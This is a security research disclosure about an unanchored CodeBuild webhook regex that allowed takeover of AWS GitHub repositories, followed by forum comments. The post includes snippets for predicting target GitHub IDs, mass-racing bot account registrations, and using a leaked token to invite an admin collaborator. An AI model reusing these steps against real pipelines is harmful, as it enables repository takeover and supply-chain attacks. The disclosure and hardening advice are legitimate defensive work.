Supply Chain Vuln Compromised Core AWS GitHub Repos & Threatened the AWS Console

2026-01-15 17:30 | www.wiz.io


Wiz Research uncovered CodeBreach, a critical vulnerability that placed the AWS Console supply chain at risk. The issue allowed a complete takeover of key AWS GitHub repositories - most notably the AWS JavaScript SDK, a core library that powers the AWS Console. By exploiting CodeBreach, attackers could have injected malicious code to launch a platform-wide compromise, potentially affecting not just the countless applications depending on the SDK, but the Console itself, threatening every AWS account.

The vulnerability stemmed from a subtle flaw in how the repositories’ AWS CodeBuild CI pipelines handled build triggers. Just two missing characters in a Regex filter allowed unauthenticated attackers to infiltrate the build environment and leak privileged credentials. This post breaks down how we leveraged this subtle misconfiguration to achieve a full repository takeover, and provides key recommendations for CodeBuild users to harden their own projects against similar attacks.

Wiz responsibly disclosed all findings to AWS, who promptly remediated the issue. AWS also implemented global hardening measures within the CodeBuild service to prevent similar attacks. Most notably, the new Pull Request Comment Approval build gate offers organizations a simple and secure path to prevent untrusted builds. Read the AWS Advisory here.

This issue follows a familiar pattern seen in recent supply-chain attacks like the Nx S1ngularity incident, where subtle CI/CD misconfigurations lead to disproportionately impactful attacks. Just last July, a threat actor abused a similar CodeBuild issue to launch a supply chain attack against users of the Amazon Q VS Code extension. This growing trend underscores the urgent need for organizations to harden their CI/CD pipelines.

Required Actions and Mitigations

While no immediate action is required by downstream consumers of the affected AWS GitHub repositories, we strongly recommend all AWS CodeBuild users implement the following safeguards to protect their own projects against similar issues.

  • Prevent Untrusted Pull Requests from Triggering Privileged Builds:

    • Use a build gate such as the new Pull Request Comment Approval feature, so pull requests from untrusted contributors cannot start a build without explicit approval.

    • If you rely on webhook filters such as ACTOR_ID, anchor the regex patterns with ^ and $ so that only exact matches are accepted (see the configuration sketch after this list).

  • Secure the CodeBuild-GitHub Connection

    • Generate a unique, fine-grained Personal Access Token (PAT) for each CodeBuild project.

    • Strictly limit the PAT's permissions to the minimum required, as listed here.

    • Consider using a dedicated unprivileged GitHub account for the CodeBuild integration.
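
For CodeBuild projects that must build pull requests, the key detail is anchoring the actor filter. The sketch below uses the AWS SDK for JavaScript v3 (@aws-sdk/client-codebuild) to update a project's webhook with an anchored actor allow-list; the project name and IDs are placeholders, and the exact filter type names and event values should be verified against the current CodeBuild documentation.

    import {
      CodeBuildClient,
      UpdateWebhookCommand,
    } from "@aws-sdk/client-codebuild";

    // Placeholder values - substitute your own project name and maintainer IDs.
    const PROJECT_NAME = "my-ci-project";
    const TRUSTED_ACTOR_IDS = ["123456", "7654321"];

    // Anchoring the alternation means "9123456780" can no longer satisfy a
    // filter that was only meant to match "123456".
    const actorPattern = `^(${TRUSTED_ACTOR_IDS.join("|")})$`;

    const client = new CodeBuildClient({});

    await client.send(
      new UpdateWebhookCommand({
        projectName: PROJECT_NAME,
        filterGroups: [
          [
            // Only react to pull request events...
            { type: "EVENT", pattern: "PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED" },
            // ...and only when the triggering GitHub account ID is an exact match.
            { type: "ACTOR_ACCOUNT_ID", pattern: actorPattern },
          ],
        ],
      })
    );

Even with an anchored filter, a build gate such as Pull Request Comment Approval remains the stronger control, since it does not depend on keeping an ID list correct over time.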

Find Vulnerable CodeBuild Projects with Wiz

Wiz customers can find CodeBuild projects that trigger builds based on untrusted pull requests using this pre-built query in the Wiz Threat Intel Center.

Why We Audited CodeBuild

Our investigation into AWS CodeBuild was sparked by the attempted supply-chain attack on the Amazon Q VS Code extension. In that incident, an attacker exploited a misconfigured CodeBuild project to compromise the extension’s GitHub repository and inject malicious code into the main branch. This code was then included in a release which users downloaded. Although the attacker’s payload ultimately failed due to a typo, it did execute on end users’ machines - clearly demonstrating the risk of misconfigured CodeBuild pipelines.

CodeBuild is a managed CI service that’s commonly connected to GitHub repositories, triggering builds on events like new pull requests. To interact with GitHub, CodeBuild requires GitHub credentials, which are, by default, present in the memory of the build environment. This creates a critical risk: if an attacker can compromise a single build, they are just a memory dump away from stealing credentials that often possess powerful permissions over the source repository.

To Build or Not To Build: The Pull Request Problem 

The most common way to compromise a CI build is through a pull request. An attacker forks the target repository, adds malicious code, and then opens a PR against the original project. If CodeBuild is configured to spawn builds on PR events, it will trigger a build based on the attacker's branch. In the vast majority of build systems like make or yarn, controlling the source code of a build process is enough to run arbitrary code. This is the exact mechanism the attacker exploited to compromise the Amazon Q extension.

To prevent this attack scenario, CodeBuild offers webhook filters - a set of rules that an event must meet to trigger a build. Back in August, these filters were the primary defense against untrusted pull requests. Among the available options, the go-to solution was the ACTOR_ID filter: an allow-list of approved GitHub user IDs that ensures only trusted users can trigger a build.

This seemed like a robust defense, but maintaining a list of user IDs can be cumbersome. We wondered: were organizations actually using this filter correctly?

To find out, we decided to search for GitHub repositories connected to Public CodeBuild projects. When set to public, CodeBuild projects expose their settings via a publicly accessible dashboard and automatically link to it in the status of any commit that triggers a build. From the dashboard, anyone can view the project's build logs and configurations - including the exact webhook filters being used.

An Apparent Dead End

Our initial scan was promising. We quickly found seven AWS-owned repositories with public CodeBuild pages. Of those, four were active and configured to run builds on pull requests:

  • The AWS SDK for JavaScript (aws/aws-sdk-js-v3)

  • AWS Libcrypto (aws/aws-lc)

  • Amazon Corretto Crypto Provider (corretto/amazon-corretto-crypto-provider)

  • The Registry of Open Data on AWS (awslabs/open-data-registry)

At first glance, everything seemed secure. All four projects implemented an ACTOR_ID filter, locking down builds to a list of approved maintainers. It appeared to be a dead end.

But the filter's syntax was unusual for a typical ID list. The user IDs weren’t separated by commas or spaces, but by a pipe | character. That small detail was the key: in regular expressions, the | character means "OR". Reviewing the documentation confirmed it: the filter wasn't a simple list, it was a regex pattern. And it had a fatal flaw.

Unanchored: How a Subtle Flaw Led to CI Compromise

The issue was simple but critical: the regex patterns weren’t anchored. Without the start ^ and end $ anchors to require an exact match, a regex engine doesn't look for a string that perfectly matches the pattern, but one that merely contains it. This meant that any GitHub user ID that is a superstring of an approved ID could bypass the filter.
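
To see the difference concretely, here is a small sketch using JavaScript regular expressions (the IDs are illustrative, not the actual maintainer IDs from the affected projects):

    // Approved maintainer IDs joined with "|", as in the vulnerable filter.
    const unanchored = new RegExp("123456|234567");
    const anchored = new RegExp("^(123456|234567)$");

    // A newer, longer ID that merely *contains* an approved ID.
    const attackerId = "912345678";

    console.log(unanchored.test(attackerId)); // true  - substring match, filter bypassed
    console.log(anchored.test(attackerId));   // false - exact match required
    console.log(anchored.test("123456"));     // true  - legitimate maintainer still allowed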

This was a powerful primitive in theory, but its success depended on a practical question: is it possible to register a brand-new GitHub user ID that contains the ID of an existing user?

When IDs Align

The answer is yes, and it hinges on how GitHub assigns IDs. Every user is given a unique and sequential numeric ID. Early accounts from 2008 have 5-digit IDs, while accounts from recent years ballooned to 9-digit IDs. As this sequence of numbers grows, it's inevitable that shorter, older IDs appear as substrings within longer, newer ones.

Based on our tests, GitHub creates roughly 200,000 new IDs each day. At that rate, for any given 6-digit maintainer ID, a new, longer ID containing it would become available for registration approximately every five days.

We dubbed this recurring window of opportunity an "eclipse" -- the moment a new, longer ID perfectly "shadowed" a trusted maintainer's ID.

All four AWS repositories had short maintainer IDs only 6 or 7 digits long, resulting in frequent eclipses that made them all valid targets. 
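
A rough way to get a feel for eclipse frequency is to scan a window of upcoming sequential IDs for values that contain a target ID as a substring; the numbers below are illustrative rather than the actual IDs involved.

    // Find upcoming sequential IDs that contain the target ID as a substring.
    function nextEclipses(targetId: string, currentId: number, horizon: number): number[] {
      const hits: number[] = [];
      for (let id = currentId + 1; id <= currentId + horizon; id++) {
        if (String(id).includes(targetId)) hits.push(id);
      }
      return hits;
    }

    // Illustrative figures: a 6-digit maintainer ID and a 9-digit current counter.
    const eclipses = nextEclipses("123456", 226_000_000, 2_000_000);
    console.log(eclipses.slice(0, 5));
    // At roughly 200,000 new IDs per day, each hit is a registration window to race for.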

Catching an Eclipse: Winning the Race for a Target ID

Having confirmed that a new GitHub ID could contain a maintainer's ID, the challenge became operational: how could we claim a specific ID the instant it became available? This was practically a race condition against the entire world, with roughly two new GitHub users created every second. We needed a way to create a lot of GitHub users at once.

The standard user sign-up flow is protected by reCAPTCHA, ruling out bulk automated account creation through that path. We needed a different approach.

Attempt #1: Organizations for ID Sampling

Our first thought was to use the GitHub Enterprise API to create organizations, which share the same ID pool as users. While this could allow us to claim the target ID, GH organization accounts can't open pull requests, making them useless for the final exploit. It wasn't a total dead end though. We repurposed this API into an ID sampling tool: we could create an organization, check its ID to see how close we were to the target ID, and then immediately delete it.

The Breakthrough: The GitHub App Manifest Flow

The real breakthrough came from GitHub Apps. Creating an app generates a corresponding bot user (e.g. app-name[bot]) that can interact with pull requests. It’s also possible to automate app creation via the manifest flow. While it’s composed of a few steps, it can be made atomic: the app and its bot are only created when a final confirmation URL is visited. 

This allowed us to prepare hundreds of app creation requests in advance and then, at the precise moment, visit all their confirmation URLs simultaneously. 
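
A minimal sketch of the racing step, assuming a list of pre-collected confirmation URLs (the URL format, session handling, and exact request details are omitted here): the idea is simply to fire all of them at once when the sampled counter approaches the target.

    // Pre-collected GitHub App manifest confirmation URLs (placeholders).
    const confirmationUrls: string[] = [
      /* ...200 URLs gathered while preparing the manifest flow... */
    ];

    // Visit every confirmation URL at once; each successful request creates an
    // app and its corresponding bot user, consuming one sequential ID.
    async function triggerRegistrations(urls: string[]): Promise<number> {
      const results = await Promise.allSettled(urls.map((url) => fetch(url)));
      return results.filter((r) => r.status === "fulfilled").length;
    }

    const created = await triggerRegistrations(confirmationUrls);
    console.log(`Triggered ${created} bot registrations`);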

With our strategy in place, it was time to execute. We periodically used the organization-creation API to sample the current GitHub ID, allowing us to accurately predict the moment of the eclipse. We also initiated the manifest flow for 200 new GitHub Apps, collecting their unique confirmation URLs.

We waited until the live ID count was just ~100 IDs away from the target ID, and then visited all 200 URLs at once, triggering a flood of new bot user registrations. The target ID was 226755743, which contained a trusted maintainer ID for the aws/aws-sdk-js-v3 repository.

After the registrations completed, a quick check confirmed our success:

We’d captured a user ID that could bypass the ACTOR_ID filter, and the method was reliable enough to be successfully repeated for each of the four target repositories.

From Bypass to Admin: Executing the Takeover

With our bot user able to bypass the ACTOR_ID filter, we were ready to execute the proof-of-concept. We chose to target the aws/aws-sdk-js-v3 repository, preparing a pull request that fixed a legitimate issue. Buried within the PR was the real payload: a new NPM package dependency designed to execute in the build environment and extract the GitHub credentials.

We submitted the PR, and soon after received a notification: a build had been triggered. Moments later, we had successfully obtained the GitHub credentials of the aws-sdk-js-v3 CodeBuild project. 

(If you're up for a challenge, try to find the commit in the PR that triggered the build.)

Our payload retrieved the GH token by dumping the memory of a process within the build environment. A previous memory dump mitigation in CodeBuild, which AWS implemented in response to the Amazon Q incident, overlooked this particular process. Following our disclosure, CodeBuild now protects this process as well. While this is a welcome improvement, it isn’t bulletproof. GitHub credentials still reside in the build’s memory, and attackers with Linux privilege escalation exploits can circumvent memory protections. That’s why the most robust mitigation is using build gates to prevent untrusted builds from running in the first place.

The Blast Radius 

The credentials we obtained were a GitHub Classic Personal Access Token (PAT) belonging to the aws-sdk-js-automation user. For an attacker, this was the perfect user to compromise, as it regularly interacts with the repository and releases new versions to GitHub.

We quickly confirmed that the aws-sdk-js-automation user had full admin privileges over the repository. Initially though, our access was scoped by the token's permissions: repo and admin:repo_hook. To escalate privileges, we abused the token’s repo scope, which can manage repository collaborators, and invited our own GitHub user to be a repository administrator.
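
The escalation relied on standard GitHub REST endpoints for managing repository collaborators; a minimal sketch of the call involved might look like the following, with the repository, username, and token all being placeholders.

    // Invite a user as a repository admin using a token that has the `repo` scope.
    const OWNER = "example-org";
    const REPO = "example-repo";
    const USERNAME = "collaborator-to-invite";
    const TOKEN = process.env.GITHUB_TOKEN!; // e.g. a leaked classic PAT

    const res = await fetch(
      `https://api.github.com/repos/${OWNER}/${REPO}/collaborators/${USERNAME}`,
      {
        method: "PUT",
        headers: {
          Authorization: `Bearer ${TOKEN}`,
          Accept: "application/vnd.github+json",
        },
        body: JSON.stringify({ permission: "admin" }),
      }
    );

    console.log(res.status); // 201 when an invitation is created, 204 if already a collaborator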

As administrators, we could now push code directly to the main branch, approve any pull request, and exfiltrate repository secrets.

This level of control provided a clear path for supply chain attacks. The JavaScript SDK is released on a weekly basis to GitHub and then to NPM. Abusing this frequent release schedule, attackers could have injected malicious payloads right before a release was published, compromising it. Just a month prior, a threat actor using this exact method successfully infected downstream users of the Amazon Q VS Code extension. 

While the Amazon Q incident was serious, the potential impact here was far greater. Based on our analysis, a staggering 66% of cloud environments include the JavaScript SDK - meaning two out of every three environments host an instance with the SDK installed. It’s an exceptionally prominent software library, and among its users is perhaps the cloud’s most critical application: the AWS Console itself. Moreover, the Console bundles recent SDK versions; during our research we observed a Console request that included user credentials and used an SDK version released just 18 days prior.

Beyond the aws-sdk-js-v3 repository, the token we obtained had full admin privileges over several other repositories related to the JavaScript SDK. Among them were three private repositories, including what appeared to be AWS’s private mirrors of the JavaScript SDK. At this point though, given the demonstrated takeover and its potential impact, we halted further research and immediately reported the issues to AWS.

Crucially, this vulnerability extended beyond the SDK. While we only performed the CI takeover on the aws-sdk-js-v3 repository, the same ACTOR_ID filter bypass was present in at least three other AWS GitHub repositories. Threat actors could have exploited these to compromise the GH credentials for three additional GH accounts. Two were automation accounts like aws-sdk-js-automation, but one was a personal GitHub account of an AWS employee.

Conclusion

This vulnerability is a textbook example of why adversaries target CI/CD environments: a subtle, easily overlooked flaw that can be exploited for massive impact. We've seen this exact pattern in the recent Nx S1ngularity and Amazon Q supply-chain attacks. 

This trend is no accident. Attackers are increasingly drawn to CI/CD systems because they represent an ideal target:

  1. They’re complex, making them prone to subtle misconfigurations;

  2. They handle untrusted data, often testing code from external contributors;

  3. They’re highly privileged, requiring powerful credentials to access code, publish artifacts, and deploy to the cloud.

This combination of complexity, untrusted data, and privileged credentials creates a perfect storm for high-impact breaches that require no prior access.

The success of recent attacks serves as a critical wake-up call. Adversaries have already shifted their focus to CI/CD pipelines, and defenders are trailing behind. Addressing this threat requires a joint effort: organizations need to reduce pipeline privileges and implement stricter build gates, and CI/CD platforms should make these secure baselines straightforward to adopt. For security teams, the first step is to enforce a simple yet powerful principle: untrusted contributions should never trigger privileged pipelines. 

Statement from AWS

AWS investigated all reported concerns highlighted by Wiz’s research team in "Infiltrating the AWS Console Supply Chain: Hijacking Core AWS GitHub Repositories via CodeBuild." In response, AWS took a number of steps to mitigate all issues discovered by Wiz, as well as additional steps and mitigations to protect against similar possible future issues. The core issue of actor ID bypass due to unanchored regexes for the identified repos was mitigated within 48 hours of first disclosure. Additional mitigations were implemented, including further protections of all build processes that contain GitHub tokens or any other credentials in memory. In addition, AWS audited all other public build environments to ensure that no such issues exist across the AWS open source estate. Finally, AWS audited the logs of all public build repositories as well as associated CloudTrail logs and determined that no other actor had taken advantage of the unanchored regex issue demonstrated by the Wiz research team. AWS determined there was no impact of the identified issue on the confidentiality or integrity of any customer environment or any AWS service.

We would like to thank Wiz’s research team for their work in identifying this issue and their responsible collaboration with us to ensure that our customers remain protected and secure.

Disclosure Timeline

  • August 25th, 2025 – Wiz Research reports the actor ID bypass and repository takeover to AWS.

  • August 25th, 2025 – AWS and Wiz meet to review the findings and discuss mitigations.

  • August 27th, 2025 – AWS anchors the vulnerable actor ID filters and revokes the personal access token of aws-sdk-js-automation.

  • September 2025 – AWS implements additional hardening to prevent non-privileged builds from accessing the project’s credentials via memory dumping.

  • January 15th, 2026 – Public disclosure.

Stay in touch!

Hi there! We are Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Ronen Shustin (@ronenshh), Hillai Ben-Sasson (@hillai), and Yuval Avrahami (@yuvalavra) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors and service providers. We would love to hear from you! Feel free to contact us on X (Twitter) or via email: research@wiz.io. 



Comments

  • By chuckadams 2026-01-15 18:45

    Breaking this down, several of AWS's core repos like the JS SDK use an allowlist of which contributor ids can run workflow actions in their PRs. The list was a regex, contained several short ids, and wasn't anchored with ^$, so if it allowed user 12345, then any userid containing 12345 could run their own actions on the PR, including one that exfiltrated access tokens. So they spammed GH with user creation requests, got an id that matched, and they were in like Flynn.

    Said tokens didn't have admin access, but had enough privileges to invite other users to become full admins. Not sure if they were rotated, but github tokens are usually long-lived, like up to a year. Hey, isn't AWS the one always lecturing us to use temporary credentials? To be fair, AWS did more than just fix the regex, they introduced an "approve workflow run" UI onto the PR process that I think GH is also using now (not sure about that).

    • By cyberax 2026-01-15 20:19

      > Said tokens didn't have admin access, but had enough privileges to invite other users to become full admins.

      Ah... Github permissions. What fun.

      Github actually has a way to federate with AWS for short-lived credentials, but then it screws everything up by completely half-assing the ghcr.io implementation. It's only available using the old deprecated classic access tokens.

      • By catlifeonmars 2026-01-16 01:50

        Right? How is it that you still need a PAT or a custom app installation to access a registry?

      • By fowl2 2026-01-18 11:21

        Yeah wow! Even most "trusted" contributors shouldn't have this level of access. Is there really no way of scoping tokens with more granularity?

        • By cyberax 2026-01-19 19:12

          Nope. The best we could do was to create a separate service that creates Docker tokens (using "docker login") and exposes a secure API.

          Obviously, GitHub needs to just fix this nonsense. But I interviewed a couple of "senior" engineers from GitHub, and I have zero hope of that happening soon.

    • By bink 2026-01-15 23:14

      As a security dude I spend way too much of my time fixing missing anchors or unescaped wildcards in regex. The good news is that it's trivial to detect with static analysis tooling. The bad news is that broken regex is often used for security checks.

      • By SkiFire13 2026-01-16 06:25

        Sometimes I wish regexes were full matches by default and required prefixing and postfixing with `.*` to get the current behaviour

        • By chuckadams 2026-01-16 16:33

          Java's Pattern.matches() method works that way. Python has two separate methods: re.match auto-anchors, re.search does not.

        • By ruined 2026-01-16 09:06

          a match isn't boolean, it's substring. the original (and more common) use-cases would become excessively verbose

    • By TacticalCoder 2026-01-15 21:04

      > The list was a regex ...

      Regexes for security allow lists: what could possibly ever go wrong, huh!?

    • By bflesch 2026-01-15 20:25

      At least the vuln was old enough so that they couldn't blame AI for it, otherwise the article would read different ;)

      • By chuckadams 2026-01-15 23:18

        Ironically (?) an AI code review would very likely have noticed the overly-permissive regex.

        • By SkiFire13 2026-01-16 06:28

          This doesn't really matter as long as they also find 10x more nits that create noise for the human reviewer.

        • By catlifeonmars 2026-01-16 01:48

          This is a good point. On my GH I’ve disabled Copilot reviews because the vast majority of them are false positives, but I’m reconsidering that position as it might still be worth it to wade through the spurious reviews just to catch some real issues.

          • By maxbond 2026-01-16 15:28

            I filter for false positives with language like this:

                For each bug you find, write a failing test. Run the test to make sure it fails. If it passes, try 1-3 times to fix the test. If you can't get it to work, delete the test and move on to the next bug.
            
            It's not perfect, you still get some non-bugs where the test fails because its premises are wrong. E.g., recently I tossed out some tests that were asserting they could index a list at `foo.len()` instead of `foo.len() - 1`. But I've found a bunch of bugs this way too.

            • By catlifeonmars 2026-01-19 19:46

              I take it this wasn’t Lua then?

              > I tossed out some tests that were asserting they could index a list at `foo.len()` instead of `foo.len() - 1`.

            • By catlifeonmars 2026-01-16 15:33

              Nice, I’ll give this a try

    • By whatever1 2026-01-15 21:50

      Another success story for Regexes! Let's keep using this cryptic mess!

      • By pxc 2026-01-15 22:34

        I met regexes when I was 13, I think. I spent a little time reading the Java API docs on the language's regex implementation and played with a couple of regex testing websites during an introductory programming class at that age. I've used them for the rest of my life without any difficulty. Strict (formal) regexes are extremely simple, and even when using crazy implementations that allow all kinds of backreferences and conditionals, 99.999% of regexes in the wild are extremely simple as well. And that's true in the example from TFA! There's nothing tricky or cryptic about this regex.

        That said, what this regex wanted to be was obviously just a list. AWS should offer simpler abstractions (like lists) where they make sense.

        • By catlifeonmars 2026-01-16 01:53

          > That said, what this regex wanted to be was obviously just a list. AWS should offer simpler abstractions (like lists) where they make sense.

          Agree. I would understand if there was some obvious advantage here, but it doesn’t really seem like there is a dimension here where regex has an advantage over a list. It’s (1) harder to implement, (2) harder to review, (3) much harder to test comprehensively, (4) harder for users to use (correctly/safely).

          • By twoodfin 2026-01-16 12:55

            Presumably the advantage was ease and speed of developing the filtering feature.

            Wrong tradeoff, to be sure.

        • By whatever1 2026-01-16 03:26

          [flagged]

          • By acdha 2026-01-16 03:43

            This is too hot a take. Regular expressions are used in some cases where they shouldn’t be, yes, but there’s also been a ton of code which used other string operations but had bugs due to the complexity or edge-cases which would have been easier to avoid with a regex. You should know both tools and when they’re appropriate.

            • By pxc 2026-01-16 15:48

              From an educational perspective, regular expressions are also a great way to teach about state machines, computational complexity, formal languages, and grammars in a way that has direct applications to tools that are long-lived and ubiquitous in industry.

              It's also this context that reveals how much simpler strict regular expressions are than general purpose programming languages like Python or JavaScript. That simplicity is also part of what makes regexes so ubiquitous: due to its lower computational complexity, regex parsing is really fast and doesn't take much memory.

              When I say regexes are simple, I'm not really talking about compactness. I mean low complexity in a computational sense! As someone who rather likes regex, I think it would be totally fair for a team to rule out all uses of PCRE2 that go beyond the scope of regular languages. Those uses of regex may be compact, but they're no longer simple.

              I'm also someone who is sensitive to readability-centered critiques of terse languages. Awk, sed, and even Bash parameter expansion can efficiently do precise transformations, too. But sometimes they should be avoided in favor of solutions that are more verbose, more explicit, and involve less special syntax. (Note also that Bash, awk, and sed are also all much more complex than regex!)

            • By whatever1 2026-01-16 04:27

              Regex is not used for parsing HTML or C++ code. So it is not good for complex tasks.

              What is the claim? That it is compact for simple cases. Well Brainfuck is a compact programming language but I don't see it in production. Why?

              Because the whole point of programming is that multiple eyeballs of different competence are looking at the same code. It has to be as legible as possible.

              • By acdha 2026-01-16 12:36

                > Regex is not used for parsing HTML or C++ code. So it is not good for complex tasks.

                Again, this is too binary a way of thinking. There are string matching operations which are not parsing source code, and regular expressions can be a concise choice there. I’ve had cases where someone wrote multiple pages of convoluted logic trying to validate things where the regular expression was not only much easier to read but also correct, because while someone was writing the third else-if block they missed a detail.

  • By btown 2026-01-15 23:02

    > To escalate privileges, we abused the token’s repo scope, which can manage repository collaborators, and invited our own GitHub user to be a repository administrator.

    From everything I know about pentesting, they should have stopped before doing this, right? From https://hackerone.com/aws_vdp?type=team :

    > You may only interact with accounts you own or with explicit written permission from AWS or the account owner

    • By bink 2026-01-15 23:13

      I think it comes down to what you do with the access. Since this is a public repo I don't think I'd be too upset at the addition of a new admin so long as they didn't do anything with that access. It's a good way to prove the impact. If it were a private repo I might feel differently.

    • By InitialBP 2026-01-16 13:17

      This comes entirely down to the scope of the agreement for the assessment. Some teams are looking for you to identify and exploit vulns in order to demonstrate the potential impact that those vulnerabilities could have.

      This is oftentimes political. The CISO wants additional budget for secure coding training and to hire more security engineers, let the pentesting firm demonstrate a massive compromise and watch the dollars roll in.

      A lot of time, especially in smaller companies, it's the opposite. No one is responsible for security and customers demand some kind of audit. "Don't touch anything we don't authorize and don't do anything that might impact our systems without explicit permissions."

      Wiz is a very prominent cloud security company who probably has incredibly lucrative contracts with AWS already, and their specialty, as I understand it, is identifying full "kill chains" in cloud environments. From access issues all the way to compromise of sensitive assets.

    • By az226 2026-01-16 05:11

      It’s possible that AWS is a Wiz customer, which would allow them to do more stuff.

      • By rand846633 2026-01-16 10:24

        I’d guess that we would not have had the pleasure of reading this article if Wiz was paid by AWS. There were multiple high-impact bugs in 2025 that we read about here, where security researchers had to turn down small six-figure bounties to avoid NDAs…

  • By mikesurowiec 2026-01-15 21:27

    I worked on docs at GitHub which are open source, synced to an internal repo, and deployed on internal infra. I recall jumping through many hoops to make it work safely. These were workflows that had secrets access for deployments, and I recall zipping files, doing some weird handoffs/file filtering between different workflows based on the triggers and permissions. Security folks were really quick to find any gaps =)

    Glad to see a few more security knobs on actions these days!

HackerNews